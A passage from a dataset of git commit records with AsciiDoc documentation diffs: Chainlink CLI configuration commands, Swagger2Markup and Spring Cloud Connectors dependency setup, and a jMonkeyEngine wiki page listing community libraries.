be provided\n5. The xml content provided is not a valid snipped of the job-operator element in the schema\n `chainlink_1_0.xsd`\n\n-d|--deployment The name attribute of the deployment element that contains\/will contain the\n job-operator element.\n-f|--file The filename of a file containing the xml model.\n-b|--base64 A base64 encoded string of the xml model.\n\n===== delete-chainlink\n\nRemove all Chainlink configuration. This command will always succeed. This command will return the\nexisting configuration as per the get-chainlink command.\n\n===== delete-chainlink-job-operator -j <job operator name>\n\nRemove a single named job-operator element. This command will return the existing configuration\nas per the get-chainlink-job-operator command. This command will fail if:\n\n1. The `job-operator` parameter is not provided.\n2. The named job-operator element does not exist.\n\n-j|--job-operator The name attribute of the job-operator element to be removed. The element must\n be a child of the subsystem element in the schema.\n\n===== delete-chainlink-deployment -d <deployment name>\n\nRemove a single named deployment element. This command will return the existing configuration as\nper the get-chainlink-deployment command. The command will fail if:\n\n1. The `deployment` argument is not provided.\n2. The named `deployment` element does not exist.\n\n-d|--deployment The name attribute of the deployment element to be removed.\n\n===== delete-chainlink-deployment-job-operator -d <deployment name> -j <job operator name>\n\nRemove a single job-operator element contained in a named deployment element. This command will\nreturn the existing configuration as per the get-chainlink-deployment-job-operator command. This\ncommand will fail if:\n\n1. Either the `deployment` or `job-operator` parameter is not provided.\n2. The named deployment element does not exist.\n3. The named job-operator element does not exist.\n\n-d|--deployment The name attribute of the deployment element that contains the job-operator\n element.\n-j|--job-operator The name attribute of the job-operator element to be removed. 
The element must\n be a child of the deployment element in the schema.\n\n===== reload-chainlink\n\nApply the configuration changes to the Chainlink runtime.\n\n[TIP]\n====\nAccidentally call delete-chainlink? The existing configuration is returned so you can save it to a\nfile and then upload it again with set-chainlink. Remember configuration changes are not visible to\nChainlink until reload-chainlink is called.\n====","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f7fe2b0cca4613c394cbe815ee5f637230b1c1ba","subject":"renamed jCenter() repository to jcenter()","message":"renamed jCenter() repository to jcenter()","repos":"Swagger2Markup\/swagger2markup","old_file":"swagger2markup-documentation\/src\/docs\/asciidoc\/getting_started.adoc","new_file":"swagger2markup-documentation\/src\/docs\/asciidoc\/getting_started.adoc","new_contents":"== Getting started\n\nSwagger2Markup is a standard .jar file. To start using it, you need to add the library to your project\u2019s classpath. Swagger2Markup is published in JCenter and Maven Central. The artifacts can be viewed at the following locations:\n\n* Releases: https:\/\/jcenter.bintray.com\/io\/github\/swagger2markup\/swagger2markup\/\n\n* Snapshots: https:\/\/oss.jfrog.org\/simple\/oss-snapshot-local\/io\/github\/swagger2markup\/swagger2markup\/\n \nIf you use Gradle or Maven, you can include Swagger2Markup as follows.\n\nWARNING: The *groupId* has been changed from *io.github.robwin* to *io.github.swagger2markup*\n\n=== Gradle\n\n==== Release\n[source,groovy, subs=\"attributes\"]\n----\nrepositories {\n jcenter()\n}\n\ncompile \"io.github.swagger2markup:swagger2markup:{release-version}\"\n----\n\n==== Snapshot\n\n[source,groovy]\n----\nrepositories {\n maven { url 'http:\/\/oss.jfrog.org\/artifactory\/oss-snapshot-local\/' }\n}\n----\n\n=== Maven\n==== Release\n\n[source,xml, subs=\"specialcharacters,attributes\"]\n----\n<repositories>\n <repository>\n <snapshots>\n <enabled>false<\/enabled>\n <\/snapshots>\n <id>jcenter-releases<\/id>\n <name>jcenter<\/name>\n <url>http:\/\/jcenter.bintray.com<\/url>\n <\/repository>\n<\/repositories>\n\n<dependency>\n <groupId>io.github.swagger2markup<\/groupId>\n <artifactId>swagger2markup<\/artifactId>\n <version>{release-version}<\/version>\n<\/dependency>\n----\n\n==== Snapshot\n\n[source,xml]\n----\n<repositories>\n <repository>\n <id>jcenter-snapshots<\/id>\n <name>jcenter<\/name>\n <url>http:\/\/oss.jfrog.org\/artifactory\/oss-snapshot-local\/<\/url>\n <\/repository>\n<\/repositories>\n----\n\n\n\n","old_contents":"== Getting started\n\nSwagger2Markup is a standard .jar file. To start using it, you need to add the library to your project\u2019s classpath. Swagger2Markup is published in JCenter and Maven Central. 
The artifacts can be viewed at the following locations:\n\n* Releases: https:\/\/jcenter.bintray.com\/io\/github\/swagger2markup\/swagger2markup\/\n\n* Snapshots: https:\/\/oss.jfrog.org\/simple\/oss-snapshot-local\/io\/github\/swagger2markup\/swagger2markup\/\n \nIf you use Gradle or Maven, you can include Swagger2Markup as follows.\n\nWARNING: The *groupId* has been changed from *io.github.robwin* to *io.github.swagger2markup*\n\n=== Gradle\n\n==== Release\n[source,groovy, subs=\"attributes\"]\n----\nrepositories {\n jCenter()\n}\n\ncompile \"io.github.swagger2markup:swagger2markup:{release-version}\"\n----\n\n==== Snapshot\n\n[source,groovy]\n----\nrepositories {\n maven { url 'http:\/\/oss.jfrog.org\/artifactory\/oss-snapshot-local\/' }\n}\n----\n\n=== Maven\n==== Release\n\n[source,xml, subs=\"specialcharacters,attributes\"]\n----\n<repositories>\n <repository>\n <snapshots>\n <enabled>false<\/enabled>\n <\/snapshots>\n <id>jcenter-releases<\/id>\n <name>jcenter<\/name>\n <url>http:\/\/jcenter.bintray.com<\/url>\n <\/repository>\n<\/repositories>\n\n<dependency>\n <groupId>io.github.swagger2markup<\/groupId>\n <artifactId>swagger2markup<\/artifactId>\n <version>{release-version}<\/version>\n<\/dependency>\n----\n\n==== Snapshot\n\n[source,java]\n----\n<repositories>\n <repository>\n <id>jcenter-snapshots<\/id>\n <name>jcenter<\/name>\n <url>http:\/\/oss.jfrog.org\/artifactory\/oss-snapshot-local\/<\/url>\n <\/repository>\n<\/repositories>\n----\n\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c36a25235869ebfe69e7c7b585b5ffbb76a62cb6","subject":"fix attribute address for wiki url","message":"fix attribute address for wiki url\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/contributions\/pages\/contributions.adoc","new_file":"docs\/modules\/contributions\/pages\/contributions.adoc","new_contents":"= Contributions\n:revnumber: 2.0\n:revdate: 2020\/07\/11\n:url-contribs: https:\/\/github.com\/jMonkeyEngine-Contributions\n:url-core: https:\/\/hub.jmonkeyengine.org\/badges\/103\/core-developer\n:url-enginelib: https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/tree\/master\n:url-forum-user: https:\/\/hub.jmonkeyengine.org\/u\n:url-github: https:\/\/github.com\n:url-jitpack: https:\/\/jitpack.io\n:url-mcentral: https:\/\/search.maven.org\/search?\n:url-mirrors: https:\/\/github.com\/jMonkeyEngine-mirrors\n:url-wiki: https:\/\/wiki.jmonkeyengine.org\n\nThe following list contains additional content for jMonkeyEngine 3 contributed by users. They are, as is the engine itself, open-source - Feel free to download and use them for your projects. :)\n\n\n[TIP]\n====\nTo install a jMonkeyEngine SDK plugin, go to `menu:Tools[Plugins>Available Plugins]`. 
+\n(Currently only jME 3.0 stable SDK, jME 3.1+ does not yet support plugins)\n====\n\n\n== Libraries with Maven coordinates\n\nJMonkeyEngine projects built using https:\/\/gradle.org\/[Gradle]\nor https:\/\/maven.apache.org\/[Maven]\ncan easily incorporate pre-built libraries from public Maven repositories.\n\n\"GroupID:ArtifactID\" entries link to package information;\nfollow these links to determine the version ID of the latest release.\n\"Name\" entries link to relevant documentation, if any.\n\n[cols=\"20,20,15,35,10\",grid=\"none\",options=\"header\"]\n|===\n|Name\n|Purpose\n|Maintainer(s)\n|Maven repository URL +\n GroupID:ArtifactID\n|Source code\n\n|https:\/\/1337atr.weebly.com\/jttf.html[jME-TTF]\n|Render TrueType fonts\n|(none)\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:jme-ttf[com.github.stephengold:jme-ttf]\n|{url-github}\/ATryder\/jME-TTF[GitHub]\n\n\n|{url-github}\/stephengold\/Heart#readme[Heart]\n|General-purpose toolkit\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:Heart[com.github.stephengold:Heart]\n|{url-github}\/stephengold\/Heart[GitHub]\n\n|{url-github}\/stephengold\/jme3-utilities#readme[Jme3-utilities-nifty]\n|Graphical user interface\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:jme3-utilities-nifty[com.github.stephengold:jme3-utilities-nifty]\n|{url-github}\/stephengold\/jme3-utilities\/tree\/master\/nifty[GitHub]\n\n|{url-github}\/stephengold\/jme3-utilities#readme[Jme3-utilities-ui]\n|Modal hotkeys and help screens\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:jme3-utilities-ui[com.github.stephengold:jme3-utilities-ui]\n|{url-github}\/stephengold\/jme3-utilities\/tree\/master\/ui[GitHub]\n\n|https:\/\/stephengold.github.io\/Minie\/minie\/overview.html[Minie]\n|3-D physics simulation\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:Minie[com.github.stephengold:Minie]\n|{url-github}\/stephengold\/Minie[GitHub]\n\n|{url-github}\/stephengold\/SkyControl#readme[SkyControl]\n|Sky simulation\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:SkyControl[com.github.stephengold:SkyControl]\n|{url-github}\/stephengold\/SkyControl[GitHub]\n\n|{url-github}\/stephengold\/Wes#readme[Wes]\n|Animation editing and retargeting\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:Wes[com.github.stephengold:Wes]\n|{url-github}\/stephengold\/Wes[GitHub]\n\n\n|{url-github}\/riccardobl\/jme3-bullet-vhacd#readme[V-HACD Collision Shape Factory]\n|Decompose meshes into convex collision shapes\n|{url-forum-user}\/RiccardoBlb[RiccardoBlb]\n|\\https:\/\/jitpack.io +\n {url-jitpack}\/#riccardobl\/jme3-bullet-vhacd[com.github.riccardobl:jme3-bullet-vhacd]\n|{url-github}\/riccardobl\/jme3-bullet-vhacd[GitHub]\n\n|{url-github}\/riccardobl\/jme-igui#readme[jme-IGUI]\n|Immediate graphical user interface\n|{url-forum-user}\/RiccardoBlb[RiccardoBlb]\n|\\https:\/\/jitpack.io +\n {url-jitpack}\/#riccardobl\/jme-igui[com.github.riccardobl:jme-igui]\n|{url-github}\/riccardobl\/jme-igui[GitHub]\n\n\n|{url-wiki}\/contributions\/gui\/tonegodgui\/tonegodgui.html[ToneGod GUI]\n|Native graphical user 
interface\n|(none)\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:tonegodgui[com.github.stephengold:tonegodgui]\n|{url-github}\/stephengold\/tonegodgui[GitHub]\n\n\n|===\n\n\n== Github Repo\n\nThis is the main repository for jmonkey contributions:\nlink:https:\/\/github.com\/jMonkeyEngine-Contributions[https:\/\/github.com\/jMonkeyEngine-Contributions]\n\n\n== Forum: Contributions\n\nThis is the forum category where you can find other people's contributions or present your own contribution:\nlink:http:\/\/hub.jmonkeyengine.org\/c\/contribution-depot-jme3[http:\/\/hub.jmonkeyengine.org\/c\/contribution-depot-jme3]\n\n\n== Other Repos\n\nThere are other repositories for code sources. A list of weblinks follows:\n\n* link:http:\/\/sourceforge.net\/projects\/jmonkeycsg\/[http:\/\/sourceforge.net\/projects\/jmonkeycsg\/]\n* link:https:\/\/github.com\/davidB\/jme3_skel[https:\/\/github.com\/davidB\/jme3_skel]\n\n\n== Frameworks\n\nThese are premade classes\/functionalities that you can use.\n\nCAUTION: These contributions are developed by jMonkeyEngine users and aren't officially supported by jMonkeyEngine. As such, these projects and the supporting documentation may become stale over time as the contributors lose interest.\n\n=== ImagePainter\n\n[.right.text-left]\nimage::http:\/\/i.imgur.com\/NYtSC.jpg[NYtSC.jpg,width=\"150\",height=\"\"]\n\nA fairly complete set of painting tools for editing jME3 Images from code.\n\n[cols=\"2\", options=\"header\"]\n|===\n\na| *Contact person*\na| {url-forum-user}\/zarch\/activity[zarch]\n\na| *Documentation*\na| link:https:\/\/hub.jmonkeyengine.org\/t\/image-painter-plugin-available\/24255[Forum Post, full javadoc in plugin]\n\na| *Available as SDK plugin*\na| Yes\n\na| *Work in progress*\na| No\n\n|===\n\n\n=== ParticleController\n\n[.right.text-left]\n\nNext Generation Particle Emitters.\n\n[cols=\"2\", options=\"header\"]\n|===\n\na| *Contact person*\na| {url-forum-user}\/zarch\/activity[zarch]\n\na| *Documentation*\na| xref:effect\/particles\/particles.adoc[Wiki Page]\n\na| *Available as SDK plugin*\na| No\n\na| *Work in progress*\na| No\n\n|===\n\n\n=== tonegodGUI\n\n[.right.text-left]\nimage::http:\/\/i.imgur.com\/0Ww1xA7.png[0Ww1xA7.png,width=\"150\",height=\"\"]\n\nA Native +++<abbr title=\"Graphical User Interface\">GUI<\/abbr>+++ Library for JME3\n\n[cols=\"2\", options=\"header\"]\n|===\n\na| *Contact person*\na| {url-forum-user}\/t0neg0d\/activity[t0neg0d]\n\na| *Documentation*\na| xref:gui\/tonegodgui\/tonegodgui.adoc[Wiki Page]\n\na| *Available as SDK plugin*\na| Yes\n\na| *Work in progress*\na| Yes\n\n|===\n\n\n=== Shaderblow\n\n[.right.text-left]\nimage::sdk:plugin\/glass-shader.png[glass-shader.png,width=\"150\",height=\"\"]\n\nThe \"`Shaderblow`\" library contains various shader effects, e.g. 
refraction, particles, forceshields, grayscale and much more.\n\n[cols=\"2\", options=\"header\"]\n|===\n\na| *Contact person*\na| {url-forum-user}\/mifth\/activity[mifth]\n\na| *Documentation*\na| xref:sdk:plugin\/shaderblow.adoc[Wiki Page]\n\na| *Available as SDK plugin*\na| Yes\n\na| *Work in progress*\na| Yes\n\n|===\n\n=== Zay-ES Entity System\n\n[.right.text-left]\nimage::http:\/\/i.imgur.com\/mQ6Uki9.jpg[mQ6Uki9.jpg,width=\"150\",height=\"\"]\n\nA self-contained thread-capable entity system.\n\n[cols=\"2\", options=\"header\"]\n|===\n\n<a| *Contact person*\na| {url-forum-user}\/pspeed\/activity[Paul Speed (pspeed)]\n\n<a| *Documentation*\n<a| xref:es\/entitysystem\/entitysystem.adoc[Wiki Page]\n\n<a| *Available as SDK plugin*\n<a| Yes\n\n<a| *Work in progress*\n<a| Seems fairly complete\n\n|===\n\n=== Lemur GUI Library\n\n[.right.text-left]\nimage::https:\/\/camo.githubusercontent.com\/dae08416ac8e7ebf5663dfcf409e8415c3b37a0f79edae535e68c69ae872b33f\/687474703a2f2f692e696d6775722e636f6d2f325075723370472e706e67[lemur,width=\"150\",height=\"\"]\n\nLemur is a GUI toolkit for making user interfaces in jMonkeyEngine applications. It supports standard 2D UIs as well as fully 3D UIs. The modular design allows an application to use all or some of it as needed or even to build a completely new custom GUI library on top.\n\n[cols=\"2\", options=\"header\"]\n|===\n\n<a| *Contact person*\na| {url-forum-user}\/pspeed\/activity[Paul Speed (pspeed)]\n\n<a| *Documentation*\n<a| link:https:\/\/github.com\/jMonkeyEngine-Contributions\/Lemur\/wiki[Wiki Page]\n\n<a| *Forum Topic*\n<a| link:https:\/\/hub.jmonkeyengine.org\/c\/user-code-projects\/lemur\/46[Lemur]\n\n<a| *Available as SDK plugin*\n<a| No\n\n<a| *Work in progress*\n<a| Complete library, well maintained and documented with examples.\n|===\n\n== Asset packs\n\n_No contributions yet_\n\n\n== Want to commit something yourself?\n\nIf you have a framework\/asset pack\/whatever you want to contribute, please check out our link:http:\/\/hub.jmonkeyengine.org\/c\/contribution-depot-jme3\/[Contribution Depot].\n\n\n== Forgot something?\n\nWell, this is a wiki page - please add projects that are available, or keep the provided information up to date.\n","old_contents":"= Contributions\n:revnumber: 2.0\n:revdate: 2020\/07\/11\n:url-contribs: https:\/\/github.com\/jMonkeyEngine-Contributions\n:url-core: https:\/\/hub.jmonkeyengine.org\/badges\/103\/core-developer\n:url-enginelib: https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/tree\/master\n:url-forum-user: https:\/\/hub.jmonkeyengine.org\/u\n:url-github: https:\/\/github.com\n:url-jitpack: https:\/\/jitpack.io\n:url-mcentral: https:\/\/search.maven.org\/search?\n:url-mirrors: https:\/\/github.com\/jMonkeyEngine-mirrors\n:url-wiki: https:\/\/wiki.jmonkeyengine.org\/\n\nThe following list contains additional content for jMonkeyEngine 3 contributed by users. They are, as is the engine itself, open-source - Feel free to download and use them for your projects. :)\n\n\n[TIP]\n====\nTo install a jMonkeyEngine SDK plugin, go to `menu:Tools[Plugins>Available Plugins]`. 
+\n(Currently only jME 3.0 stable SDK, jME 3.1+ does not yet support plugins)\n====\n\n\n== Libraries with Maven coordinates\n\nJMonkeyEngine projects built using https:\/\/gradle.org\/[Gradle]\nor https:\/\/maven.apache.org\/[Maven]\ncan easily incorporate pre-built libraries from public Maven repositories.\n\n\"GroupID:ArtifactID\" entries link to package information;\nfollow these links to determine the version ID of the latest release.\n\"Name\" entries link to relevant documentation, if any.\n\n[cols=\"20,20,15,35,10\",grid=\"none\",options=\"header\"]\n|===\n|Name\n|Purpose\n|Maintainer(s)\n|Maven repository URL +\n GroupID:ArtifactID\n|Source code\n\n|https:\/\/1337atr.weebly.com\/jttf.html[jME-TTF]\n|Render TrueType fonts\n|(none)\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:jme-ttf[com.github.stephengold:jme-ttf]\n|{url-github}\/ATryder\/jME-TTF[GitHub]\n\n\n|{url-github}\/stephengold\/Heart#readme[Heart]\n|General-purpose toolkit\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:Heart[com.github.stephengold:Heart]\n|{url-github}\/stephengold\/Heart[GitHub]\n\n|{url-github}\/stephengold\/jme3-utilities#readme[Jme3-utilities-nifty]\n|Graphical user interface\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:jme3-utilities-nifty[com.github.stephengold:jme3-utilities-nifty]\n|{url-github}\/stephengold\/jme3-utilities\/tree\/master\/nifty[GitHub]\n\n|{url-github}\/stephengold\/jme3-utilities#readme[Jme3-utilities-ui]\n|Modal hotkeys and help screens\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:jme3-utilities-ui[com.github.stephengold:jme3-utilities-ui]\n|{url-github}\/stephengold\/jme3-utilities\/tree\/master\/ui[GitHub]\n\n|https:\/\/stephengold.github.io\/Minie\/minie\/overview.html[Minie]\n|3-D physics simulation\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:Minie[com.github.stephengold:Minie]\n|{url-github}\/stephengold\/Minie[GitHub]\n\n|{url-github}\/stephengold\/SkyControl#readme[SkyControl]\n|Sky simulation\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:SkyControl[com.github.stephengold:SkyControl]\n|{url-github}\/stephengold\/SkyControl[GitHub]\n\n|{url-github}\/stephengold\/Wes#readme[Wes]\n|Animation editing and retargeting\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:Wes[com.github.stephengold:Wes]\n|{url-github}\/stephengold\/Wes[GitHub]\n\n\n|{url-github}\/riccardobl\/jme3-bullet-vhacd#readme[V-HACD Collision Shape Factory]\n|Decompose meshes into convex collision shapes\n|{url-forum-user}\/RiccardoBlb[RiccardoBlb]\n|\\https:\/\/jitpack.io +\n {url-jitpack}\/#riccardobl\/jme3-bullet-vhacd[com.github.riccardobl:jme3-bullet-vhacd]\n|{url-github}\/riccardobl\/jme3-bullet-vhacd[GitHub]\n\n|{url-github}\/riccardobl\/jme-igui#readme[jme-IGUI]\n|Immediate graphical user interface\n|{url-forum-user}\/RiccardoBlb[RiccardoBlb]\n|\\https:\/\/jitpack.io +\n {url-jitpack}\/#riccardobl\/jme-igui[com.github.riccardobl:jme-igui]\n|{url-github}\/riccardobl\/jme-igui[GitHub]\n\n\n|{url-wiki}\/contributions\/gui\/tonegodgui\/tonegodgui.html[ToneGod GUI]\n|Native graphical user 
interface\n|(none)\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:tonegodgui[com.github.stephengold:tonegodgui]\n|{url-github}\/stephengold\/tonegodgui[GitHub]\n\n\n|===\n\n\n== Github Repo\n\nThis is the main repository for jmonkey contributions:\nlink:https:\/\/github.com\/jMonkeyEngine-Contributions[https:\/\/github.com\/jMonkeyEngine-Contributions]\n\n\n== Forum: Contributions\n\nThis is the forum category where you can find other people's contributions or present your own contribution:\nlink:http:\/\/hub.jmonkeyengine.org\/c\/contribution-depot-jme3[http:\/\/hub.jmonkeyengine.org\/c\/contribution-depot-jme3]\n\n\n== Other Repos\n\nThere are other repositories for code sources. A list of weblinks follows:\n\n* link:http:\/\/sourceforge.net\/projects\/jmonkeycsg\/[http:\/\/sourceforge.net\/projects\/jmonkeycsg\/]\n* link:https:\/\/github.com\/davidB\/jme3_skel[https:\/\/github.com\/davidB\/jme3_skel]\n\n\n== Frameworks\n\nThese are premade classes\/functionalities that you can use.\n\nCAUTION: These contributions are developed by jMonkeyEngine users and aren't officially supported by jMonkeyEngine. As such, these projects and the supporting documentation may become stale over time as the contributors lose interest.\n\n=== ImagePainter\n\n[.right.text-left]\nimage::http:\/\/i.imgur.com\/NYtSC.jpg[NYtSC.jpg,width=\"150\",height=\"\"]\n\nA fairly complete set of painting tools for editing jME3 Images from code.\n\n[cols=\"2\", options=\"header\"]\n|===\n\na| *Contact person*\na| {url-forum-user}\/zarch\/activity[zarch]\n\na| *Documentation*\na| link:https:\/\/hub.jmonkeyengine.org\/t\/image-painter-plugin-available\/24255[Forum Post, full javadoc in plugin]\n\na| *Available as SDK plugin*\na| Yes\n\na| *Work in progress*\na| No\n\n|===\n\n\n=== ParticleController\n\n[.right.text-left]\n\nNext Generation Particle Emitters.\n\n[cols=\"2\", options=\"header\"]\n|===\n\na| *Contact person*\na| {url-forum-user}\/zarch\/activity[zarch]\n\na| *Documentation*\na| xref:effect\/particles\/particles.adoc[Wiki Page]\n\na| *Available as SDK plugin*\na| No\n\na| *Work in progress*\na| No\n\n|===\n\n\n=== tonegodGUI\n\n[.right.text-left]\nimage::http:\/\/i.imgur.com\/0Ww1xA7.png[0Ww1xA7.png,width=\"150\",height=\"\"]\n\nA Native +++<abbr title=\"Graphical User Interface\">GUI<\/abbr>+++ Library for JME3\n\n[cols=\"2\", options=\"header\"]\n|===\n\na| *Contact person*\na| {url-forum-user}\/t0neg0d\/activity[t0neg0d]\n\na| *Documentation*\na| xref:gui\/tonegodgui\/tonegodgui.adoc[Wiki Page]\n\na| *Available as SDK plugin*\na| Yes\n\na| *Work in progress*\na| Yes\n\n|===\n\n\n=== Shaderblow\n\n[.right.text-left]\nimage::sdk:plugin\/glass-shader.png[glass-shader.png,width=\"150\",height=\"\"]\n\nThe \"`Shaderblow`\" library contains various shader effects, e.g. 
refraction, particles, forceshields, grayscale and much more.\n\n[cols=\"2\", options=\"header\"]\n|===\n\na| *Contact person*\na| {url-forum-user}\/mifth\/activity[mifth]\n\na| *Documentation*\na| xref:sdk:plugin\/shaderblow.adoc[Wiki Page]\n\na| *Available as SDK plugin*\na| Yes\n\na| *Work in progress*\na| Yes\n\n|===\n\n=== Zay-ES Entity System\n\n[.right.text-left]\nimage::http:\/\/i.imgur.com\/mQ6Uki9.jpg[mQ6Uki9.jpg,width=\"150\",height=\"\"]\n\nA self-contained thread-capable entity system.\n\n[cols=\"2\", options=\"header\"]\n|===\n\n<a| *Contact person*\na| {url-forum-user}\/pspeed\/activity[Paul Speed (pspeed)]\n\n<a| *Documentation*\n<a| xref:es\/entitysystem\/entitysystem.adoc[Wiki Page]\n\n<a| *Available as SDK plugin*\n<a| Yes\n\n<a| *Work in progress*\n<a| Seems fairly complete\n\n|===\n\n=== Lemur Gui Library\n[.right.text-left]\nimage::https:\/\/camo.githubusercontent.com\/dae08416ac8e7ebf5663dfcf409e8415c3b37a0f79edae535e68c69ae872b33f\/687474703a2f2f692e696d6775722e636f6d2f325075723370472e706e67[lemur,width=\"150\",height=\"\"]\n\nLemur is GUI toolkit for making user interfaces in jMonkeyEngine applications. It supports standard 2D UIs as well as fully 3D UIs. The modular design allows an application to use all or some of it as needed or even to build a completely new custom GUI library on top.\n\n[cols=\"2\", options=\"header\"]\n|===\n\n<a| *Contact person*\na| {url-forum-user}\/pspeed\/activity[Paul Speed (pspeed)]\n\n<a| *Documentation*\n<a| link:https:\/\/github.com\/jMonkeyEngine-Contributions\/Lemur\/wiki[Wiki Page]\n\n<a| *Forum Topic*\n<a| link:https:\/\/hub.jmonkeyengine.org\/c\/user-code-projects\/lemur\/46[Lemur]\n\n<a| *Available as SDK plugin*\n<a| No\n\n<a| *Work in progress*\n<a| Complete library, well maintained and documented with examples.\n|===\n\n== Assets packs\n\n_No contributions yet_\n\n\n== Want to commit something yourself?\n\nIf you have a framework\/assets pack\/whatever you want to contribute, please check out our link:http:\/\/hub.jmonkeyengine.org\/c\/contribution-depot-jme3\/[Contribution Depot].\n\n\n== Forgot something?\n\nWell, this is a wiki page - Please add projects that are available or keep the provided information up-to-date if you want.\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"2f17345c0a9ad3617e2f643bc2065ba338747453","subject":"Rule 17: omit needless words","message":"Rule 17: omit needless words\n","repos":"scottfrederick\/spring-cloud-connectors,spring-cloud\/spring-cloud-connectors,chrisjs\/spring-cloud-connectors,spring-cloud\/spring-cloud-connectors,scottfrederick\/spring-cloud-connectors,chrisjs\/spring-cloud-connectors","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-connectors.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-connectors.adoc","new_contents":":github-tag: master\n:github-repo: spring-cloud\/spring-cloud-connectors\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:toc: left\n:toclevels: 3\n\n= Spring Cloud Connectors\n\n[[spring-cloud-connectors-install]]\n\n== Introduction\n\nSpring Cloud Connectors provides a simple abstraction for JVM-based applications running on cloud platforms to discover bound services and deployment information at runtime, and provides support for registering discovered services as Spring beans. 
It is based on a plugin model so that the identical compiled application can be deployed locally or on any of multiple cloud platforms, and it supports custom service definitions through Java Service Provider Interfaces (SPI).\n\nThe Connectors project provides out-of-the-box support for discovering common services on Heroku and Cloud Foundry clouds. It also includes a properties-based connector that can supply configuration for development and testing.\n\n=== Concepts\n\nThe core Connectors concepts are described below.\n\n[cols=\"3,7\", width=\"100%\"]\n|===========================================================================================================================================================================\n|**Cloud Connector** |A platform-specific interface that identifies the presence of the platform and discovers any services bound to the application deployment.\n|**Service Connector** |An object that represents a runtime connection to a service (for example, a `javax.sql.DataSource`).\n|**Service Information** |Information about the underlying service (such as host, port, and credentials).\n|**Application Information** |Information about the application and the particular running instance.\n|===========================================================================================================================================================================\n\n=== Submodules\n\nThe project contains three major submodules.\n\n* **Spring Cloud Connectors Core**: The core library, which is both cloud-agnostic and Spring-agnostic. It provides a programmatic entry point for developers who prefer to access cloud services and application information manually. It also provides basic service definitions for several common services (databases, message queues) and an SPI-based extension mechanism for contributing cloud and service connectors.\n* **Spring Cloud Spring Service Connector**: A Spring library that exposes application information, cloud information, and discovered services as Spring beans of the appropriate type (for example, an SQL service will be exposed as a `javax.sql.DataSource` with optional connection pooling).\n* The cloud connectors:\n ** **Spring Cloud Cloud Foundry Connector**: Connector for link:http:\/\/cloudfoundry.org\/[Cloud Foundry].\n ** **Spring Cloud Heroku Connector**: Connector for link:https:\/\/www.heroku.com\/[Heroku].\n ** **Spring Cloud local-configuration Connector**: Properties-based connector for manually providing configuration information during development or testing. Allows use of the same Spring Cloud configuration wiring in all stages of application deployment.\n\n== Getting Started\n\nSee below for examples of how to include the appropriate dependencies using your build system.\n\n=== Including Cloud Connectors\n\nInclude the connector for each cloud platform which you want to be discoverable. 
Including multiple connectors is perfectly fine; each connector will determine whether it should be active in a particular environment.\n\nIn Maven, replacing `${VERSION}` with the desired artifact version:\n\n[source,xml]\n----\n<!-- To use Spring Cloud Connectors for development -->\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-localconfig-connector<\/artifactId>\n <version>${VERSION}<\/version>\n<\/dependency>\n\n<!-- If you intend to deploy the app to Cloud Foundry -->\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-cloudfoundry-connector<\/artifactId>\n <version>${VERSION}<\/version>\n<\/dependency>\n\n<!-- If you intend to deploy the app to Heroku -->\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-heroku-connector<\/artifactId>\n <version>${VERSION}<\/version>\n<\/dependency>\n----\n\nIn Gradle, replacing `${VERSION}` with the desired version:\n\n[source,groovy]\n----\ndependencies {\n\n \/\/ To use Spring Cloud Connectors for development\n compile 